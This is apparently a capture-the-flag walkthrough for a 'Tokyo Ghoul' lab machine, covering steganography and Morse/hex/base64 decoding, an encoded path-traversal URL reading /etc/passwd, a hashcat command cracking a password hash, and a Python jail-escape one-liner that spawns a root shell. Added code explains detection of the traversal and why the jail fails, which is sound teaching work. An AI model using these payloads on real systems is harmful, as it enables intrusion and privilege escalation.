Tokyo Ghoul

1. Scanning all ports and OS.

sudo nmap -sV -p- 10.10.10.64

2. Website, links and its source code.

jasonroom.html

3. FTP to the machine to check the available files.

4. Downloading and checking all the files.

mget *
Aogiri_tree.txt
need_to_talk

5. Checking the lines above and below the keyword.

strings need_to_talk | grep phrase -A 5 -B 5

6. Using the found word.

7. Examining the picture and extracting new data.

rize_and_kaneki.jpg
steghide --extract -sf rize_and_kaneki.jpg
passphrase: You_found_1t
yougotme.txt
..... .-
....- ....-
....- -....
--... ----.
....- -..
...-- ..---
....- -..
...-- ...--
....- -..
....- ---..
....- .-
...-- .....
..... ---..
...-- ..---
....- .
-.... -.-.
-.... ..---
-.... .
..... ..---
-.... -.-.
-.... ...--
-.... --...
...-- -..
...-- -..
Decoding chain: Morse code, then hex, then base64.

Using only the CLI:

1. Copy the file and remove all the unnecessary text.

2. Decode the text with the morse2ascii tool and redirect the output to a new file.

3. Convert the output with xxd and decode the base64 text.

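The same decoding chain done in Python, as an added worked example that is not part of the original writeup: it replaces morse2ascii and xxd with a Morse lookup table, bytes.fromhex and base64, using the contents of yougotme.txt exactly as listed above.

```python
import base64

# Added worked example (not part of the original writeup): the decoding chain
# from step 7 done in Python instead of with morse2ascii and xxd.
# Each line of yougotme.txt holds one byte as two Morse-encoded hex digits;
# the hex decodes to a base64 string, which decodes to the hidden directory.

MORSE_TO_CHAR = {
    ".-": "A", "-...": "B", "-.-.": "C", "-..": "D", ".": "E", "..-.": "F",
    "--.": "G", "....": "H", "..": "I", ".---": "J", "-.-": "K", ".-..": "L",
    "--": "M", "-.": "N", "---": "O", ".--.": "P", "--.-": "Q", ".-.": "R",
    "...": "S", "-": "T", "..-": "U", "...-": "V", ".--": "W", "-..-": "X",
    "-.--": "Y", "--..": "Z",
    "-----": "0", ".----": "1", "..---": "2", "...--": "3", "....-": "4",
    ".....": "5", "-....": "6", "--...": "7", "---..": "8", "----.": "9",
}

# Contents of yougotme.txt as recovered in the writeup (copied from the page).
YOUGOTME_MORSE = """\
..... .-
....- ....-
....- -....
--... ----.
....- -..
...-- ..---
....- -..
...-- ...--
....- -..
....- ---..
....- .-
...-- .....
..... ---..
...-- ..---
....- .
-.... -.-.
-.... ..---
-.... .
..... ..---
-.... -.-.
-.... ...--
-.... --...
...-- -..
...-- -..
"""


def morse_to_text(morse: str) -> str:
    """Translate whitespace-separated Morse symbols into characters."""
    return "".join(MORSE_TO_CHAR[symbol] for symbol in morse.split())


def decode_chain(morse: str) -> dict:
    """Morse -> hex digits -> ASCII (base64 text) -> decoded plaintext."""
    hex_digits = morse_to_text(morse)
    base64_text = bytes.fromhex(hex_digits).decode("ascii")
    plaintext = base64.b64decode(base64_text, validate=True).decode("ascii")
    return {"hex": hex_digits, "base64": base64_text, "plaintext": plaintext}


if __name__ == "__main__":
    for stage, value in decode_chain(YOUGOTME_MORSE).items():
        print(f"{stage:9} {value}")
```

The intermediate stages are returned alongside the final value so each hop of the chain can be checked on its own; a typo in a single Morse symbol shows up as a non-hex character or an invalid base64 string rather than a silently wrong directory name.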

8. Checking the new directory on the website.

d1r3c70ry_center

9. Scanning the directory.

gobuster dir -w /usr/share/seclists/Discovery/Web-Content/big.txt -u http://10.10.10.64/d1r3c70ry_center -q
/d1r3c70ry_center/claim/

10. Both buttons show the same URL; checking for LFI.

11. Trying again with URL encoding.

http://<IP>/d1r3c70ry_center/claim/index.php?view=%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Fpasswd
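From the defensive side, the traversal in step 11 only got through once "../" was percent-encoded, so any log review or request filter has to decode before it inspects. The following is an added example, not part of the original writeup: it decodes each query parameter repeatedly (single and double encoding) and flags any value that still contains a ".." path segment. The sample requests are constructed; the second one is the URL shown above.

```python
from urllib.parse import parse_qs, unquote, urlsplit

# Added example (not part of the original writeup): a log-review check for the
# traversal pattern in step 11. The payload only worked once "../" was
# percent-encoded, so the check decodes repeatedly (single and double
# encoding) and looks for ".." path segments in every query parameter.


def fully_unquote(value: str, max_rounds: int = 3) -> str:
    """Undo percent-encoding until the string stops changing."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def traversal_params(url: str) -> dict:
    """Map each query parameter carrying a '..' segment to its decoded value."""
    query = urlsplit(url).query
    findings = {}
    for name, values in parse_qs(query, keep_blank_values=True).items():
        for raw in values:  # parse_qs already removed one layer of encoding
            decoded = fully_unquote(raw).replace("\\", "/")
            if any(segment == ".." for segment in decoded.split("/")):
                findings[name] = decoded
    return findings


# Constructed sample requests (not real log data); the second is the writeup's URL.
SAMPLE_REQUESTS = [
    "http://10.10.10.64/d1r3c70ry_center/claim/index.php?view=page1",
    "http://10.10.10.64/d1r3c70ry_center/claim/index.php"
    "?view=%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Fpasswd",
    "http://10.10.10.64/d1r3c70ry_center/claim/index.php?view=%252e%252e%252fconfig",
]


def flag_requests(requests):
    """Return (url, findings) for every request that contains a traversal attempt."""
    flagged = []
    for url in requests:
        findings = traversal_params(url)
        if findings:
            flagged.append((url, findings))
    return flagged


if __name__ == "__main__":
    for url, findings in flag_requests(SAMPLE_REQUESTS):
        print(findings, "<-", url)
```

Checking for a literal ".." segment after decoding, rather than normalising the path, is deliberate: posixpath.normpath would collapse "/../../etc/passwd" to "/etc/passwd" and hide the very thing the check is looking for. The decoding loop is capped so a request cannot keep the filter busy with endless nested encoding.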

12. Cracking the hash.

hashcat.exe -a 0 -m 1800 "$6$Tb/euwmK$OXA.dwMeOAcopwBl68boTG5zi65wIHsc84OWAIye5VITLLtVlaXvRDJXET..it8r.jbrlpfZeMdwD3B0fGxJI0" rockyou.txt

13. SSH to the machine.

14. User.txt flag.

15. Checking sudo permissions and the Python script.

16. Escaping the Python jail through __builtins__.

__builtins__.__dict__['__IMPORT__'.lower()]('OS'.lower()).__dict__['SYSTEM'.lower()]('/bin/bash')
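Why the jail falls to this one-liner, as an added example that is not part of the original writeup: a jail that scans the source text for words like "import", "os" or "system" never sees them, because the payload spells them in upper case and only assembles the real names at run time with str.lower(). The word list below is hypothetical, not the script's own; the payload string is only parsed and inspected here, never executed. A literal-only evaluator (ast.literal_eval) is shown as the safer policy, since it rejects names, attribute access and calls regardless of how they are spelled.

```python
import ast

# Added example (not part of the original writeup): why the jail in step 16 is
# escapable. A blacklist that scans the source text for forbidden words misses
# the payload because "__import__", "os" and "system" are only assembled at
# run time by str.lower(). A literal-only evaluator (ast.literal_eval) rejects
# any expression containing names, attribute access or calls, however they
# are spelled. FORBIDDEN is a hypothetical word list, not the script's own.

FORBIDDEN = ("import", "os", "system", "eval", "exec", "open", "subprocess")

# The exact expression from the writeup; it is inspected here, never executed.
JAIL_ESCAPE = (
    "__builtins__.__dict__['__IMPORT__'.lower()]('OS'.lower())"
    ".__dict__['SYSTEM'.lower()]('/bin/bash')"
)


def blacklist_allows(expr: str) -> bool:
    """Naive jail: accept the expression unless a forbidden word appears verbatim."""
    return not any(word in expr for word in FORBIDDEN)


def literal_only_allows(expr: str) -> bool:
    """Safer policy: accept only Python literals (numbers, strings, lists, dicts...)."""
    try:
        ast.literal_eval(expr)
    except (ValueError, SyntaxError, TypeError, MemoryError, RecursionError):
        return False
    return True


def risky_nodes(expr: str) -> list:
    """Report the AST node types that make an expression unsafe to evaluate."""
    tree = ast.parse(expr, mode="eval")
    unsafe = (ast.Call, ast.Attribute, ast.Name, ast.Subscript)
    return sorted({type(node).__name__ for node in ast.walk(tree)
                   if isinstance(node, unsafe)})


if __name__ == "__main__":
    print("blacklist allows payload:", blacklist_allows(JAIL_ESCAPE))
    print("literal_eval allows payload:", literal_only_allows(JAIL_ESCAPE))
    print("node types that make it unsafe:", risky_nodes(JAIL_ESCAPE))
```

The lesson for anyone writing such a script: filtering the text of an expression is not a sandbox, because the expression can build whatever text it likes at run time. Either restrict input to literals, or do not evaluate user-controlled code at all, especially in a script that sudo lets an unprivileged user run.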

17. Root.txt flag.
